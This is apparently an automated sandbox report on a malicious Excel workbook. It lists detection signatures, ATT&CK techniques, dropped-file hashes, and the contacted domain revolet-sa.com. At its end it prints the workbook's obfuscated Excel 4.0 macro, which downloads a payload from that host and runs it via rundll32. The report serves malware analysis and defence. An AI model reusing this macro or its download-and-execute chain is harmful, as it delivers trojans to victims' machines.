Play interactive tourEdit tour
Analysis Report 1A8C92C-1A8C92C.xls
Overview
General Information
Detection
Hidden Macro 4.0
Score: | 84 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth |
|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
Show All Signature Results
AV Detection: |
---|
Antivirus detection for URL or domain | Show sources |
Source: | Avira URL Cloud: |
Source: | File opened: |
Source: | Binary string: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | IP Address: |
Source: | HTTP traffic detected: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Memory allocated: | ||
Source: | Memory allocated: |
Source: | OLE indicator, VBA macros: |
Source: | Dropped File: | ||
Source: | Dropped File: |
Source: | Matched rule: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Process created: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Binary string: |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: |
Source: | Process created: | ||
Source: | Process created: |
Source: | Key value queried: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting11 | Path Interception | Process Injection11 | Masquerading121 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution33 | Logon Script (Windows) | Logon Script (Windows) | Process Injection11 | Security Account Manager | System Information Discovery3 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol12 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting11 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rundll321 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | Metadefender | Browse | ||
2% | ReversingLabs | Win32.Trojan.Trickpak | ||
5% | Metadefender | Browse | ||
2% | ReversingLabs | Win32.Trojan.Trickpak |
Unpacked PE Files |
---|
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | TR/Crypt.XPACK.Gen | Download File |
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
100% | Avira URL Cloud | malware | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
revolet-sa.com | 192.232.249.186 | true | false | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| low | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
192.232.249.186 | revolet-sa.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 383028 |
Start date: | 07.04.2021 |
Start time: | 07:09:08 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 30s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | 1A8C92C-1A8C92C.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal84.expl.evad.winXLS@7/8@1/1 |
EGA Information: | Failed |
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
07:09:39 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
192.232.249.186 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
revolet-sa.com | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
UNIFIEDLAYER-AS-1US | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3M1Xc[1].fbx | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
C:\Users\user\sdbybsd.fds | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 688241 |
Entropy (8bit): | 7.064532901692121 |
Encrypted: | false |
SSDEEP: | 12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx |
MD5: | 7DF0611CD75FA4C02B29070728C37247 |
SHA1: | 1095F8922D93458EFBC97612D8A5DEA8DB8325A5 |
SHA-256: | AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1 |
SHA-512: | 167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Reputation: | low |
IE Cache URL: | http://revolet-sa.com/files/countryyelow.php |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 67965 |
Entropy (8bit): | 7.879459857289466 |
Encrypted: | false |
SSDEEP: | 1536:Ltke3BrWGHJyW32AeWviHcM8OlMVGoIahaDHTU6hryF70E:LqeRrW2JyW32AiHD2sTU2yF70E |
MD5: | 9842F73BEBDA1F816A21C9C89EBF722C |
SHA1: | 44635E0DC6B4D2104DEB0812E58B62D69EE9D5A7 |
SHA-256: | 472A639EF51E8A9CDFD06E797CA8CF99C7BB85AEED79160D0F367D7784365155 |
SHA-512: | 1E1EAA02771CE00C5B036D53CED95C0CB3A436AD8A4825743870258FEBF0873D3DAADD006D2C81AEC38C2F5A5A654D8C8322BE2204FF5726AC08E43D483A3BDF |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Windows\SysWOW64\rundll32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2178 |
Entropy (8bit): | 7.012005948259818 |
Encrypted: | false |
SSDEEP: | 48:Kb6UYQ7XLdcm1BjUYKpnb6UY8tfeDof3zAI88Yehn:Kb6CFcm1BWnb6mfeofDf8In |
MD5: | 66EC936451064576E96053814B524D8E |
SHA1: | 9B0D556322E3776F656038D6324B2238DF7C83F1 |
SHA-256: | FAACB5E4238A45B5C6ECFEFA3820080F50C331FF2B95173AB47EF3AA4743731E |
SHA-512: | EEAC85A510219DA071735DFC3B35CA13E56F65E404D3609D1B1453B5F8D7A1DD5C8AD799EC3E13406B7232C3A08B20E17160DAE5F61D93866D480E0A352E33B9 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2078 |
Entropy (8bit): | 4.49395331622355 |
Encrypted: | false |
SSDEEP: | 48:8pxn/XT3IkcSeJozQqQh2pxn/XT3IkcSeJozQqQ/:8p9/XLIkqqzQqQh2p9/XLIkqqzQqQ/ |
MD5: | B9C87F86AB426BAB220239030DDDAA10 |
SHA1: | 69F13975ED848B8C8D8D3C998A3A9E4298C6E68E |
SHA-256: | F83451C275FA9E90AFB786F281A07F8CC0703E520ACBD9C18F8B0C8F433F8279 |
SHA-512: | 6A1685DCCCC5E146F07606B3AFA2F5B029F525108171B226860635A85BEBB45B25569659AD116BFCBC7E75F554C57AAEADD317F4317D283E44A4C57DD414BCBB |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.477005331237777 |
Encrypted: | false |
SSDEEP: | 12:85QBO3b3cLgXg/XAlCPCHaXgzB8IB/PxiUUDpX+Wnicvb8X+bDtZ3YilMMEpxRld:85hjK/XTwz6IbiJYePDv3qdwrNru/ |
MD5: | 0F73A8D021A01CD04B71B4D1081CBC66 |
SHA1: | C1E9F58BAA5178BD16B9B7322E28AEBD092B0DCF |
SHA-256: | F1D5434B6F42340A44592D8908A68513E429FA019BDA1D7887D4DEE412011997 |
SHA-512: | 19B9390DCE4DD7AA3008BE3526FCA7B5A694808CB338B65115C571C3A349601BB1E47937A8897C49409C4D18B70496BF31CCC605FB41544DB2B0607223D6729C |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 98 |
Entropy (8bit): | 4.399426680408379 |
Encrypted: | false |
SSDEEP: | 3:oyBVomMMk9WPulGmWPulmMMk9WPulv:dj6aWYrWxaW1 |
MD5: | 9D94E53C38653B25AE525F0CC2253B09 |
SHA1: | 90F33DAD1FCA3415C790A0072B9F07B05DF2A3BB |
SHA-256: | BE1F754789EF0A781C85FD38FC5D45C7B925D0A8636F3B02792F9F90E1ABE14C |
SHA-512: | 94F02CBB4B181764B0E5C9173B8473A8D274ECE8B5A39CC1FA20FEF7F09D770232E9A4CAF46B8180561087A3ED03EDF0D6B616DDF10F25136A0CCF4D1A7B1BB3 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 127008 |
Entropy (8bit): | 7.230491021864619 |
Encrypted: | false |
SSDEEP: | 3072:ZI8rmjAItyzElBIL6lECbgBGGP5xLmuCSi2jTUqyF70Si2W2vXmw5vXmwQI8rmjy:G8rmjAItyzElBIL6lECbgBvP5NmuCSh5 |
MD5: | 63317E50375F30B46FECFDE3EBADCC4A |
SHA1: | 09DF3BB631603B67550B02176C577ADFF1B810AB |
SHA-256: | D4F8728B67702276E5DF6DBDBCC2950D03E59DB7390D3348A0A6EA40AA68C9C2 |
SHA-512: | 384B7A81EE7CC6D6068280D19D8B1D020801DA2BF29EC0D63AF53B9DF683EBDD9406AEA8B11E566E0AEC944DBBABF8CC9B6259F87FB7B7BB04577E77B72E2D58 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 688241 |
Entropy (8bit): | 7.064532901692121 |
Encrypted: | false |
SSDEEP: | 12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx |
MD5: | 7DF0611CD75FA4C02B29070728C37247 |
SHA1: | 1095F8922D93458EFBC97612D8A5DEA8DB8325A5 |
SHA-256: | AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1 |
SHA-512: | 167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 3.0873527347414935 |
TrID: |
|
File name: | 1A8C92C-1A8C92C.xls |
File size: | 267776 |
MD5: | d8ed80402de2b621219044b3a2c022c5 |
SHA1: | e2f86c9431081da7f57cc014a9f2f7b870ea0aad |
SHA256: | d98b11f1599985cc16c8dd10ea53ea5a1b9ac752d5d30c460c198b4a2a83ad9b |
SHA512: | 1bc7b3a5973019ded3a136824ea54653d3189d729e3e07a811082844829362c3f4dd78c478d2aaea0c0e044092d4d96cd0a6b1e8b7ccbb8ba89ad1814e723540 |
SSDEEP: | 6144:JcPiTQAVW/89BQnmlcGvgZ7rDjo8UOMIJK+xTh0E:FhE |
File Content Preview: | ........................>...................................................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "1A8C92C-1A8C92C.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-04-06 14:04:37 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.342986545458 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c s 3 . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d0 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 8d 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 05 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.247889866731 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . H L . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00 |
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 255780 |
---|
General | |
---|---|
Stream Path: | Book |
File Type: | Applesoft BASIC program data, first line number 8 |
Stream Size: | 255780 |
Entropy: | 3.03349063455 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 1 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . |
Data Raw: | 09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA(Docs3!$BE$26&Docs3!$BE$27&Docs3!$BE$28&""n"",BV9)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=Docs2!AI20()",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=EXEC(""r""&Docs3!BB33&Docs3!BB37&Docs3!BM23&Docs3!BI33&Docs3!BI36)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=Docs4!BA9()",,,,,,
,,http://,,,"=""php""",,"=""revolet-sa.com/files/countryyelow""",,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA.ARRAY(""U""&Docs3!$BH$26&Docs3!$BH$27&Docs3!$BH$28&Docs3!$BH$29,Docs1!BV10)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)",,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=CALL(Docs1!BV9,Docs1!BV10,Docs3!BK26&Docs3!BK28,0,before.3.13.34.sheet!AK14&before.3.13.34.sheet!AK15&Docs3!BP25&before.3.13.34.sheet!AN14,Docs3!BM23,0,0)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=Docs1!$AX$27()",,,,,
=HALT()
Network Behavior |
---|
Network Port Distribution |
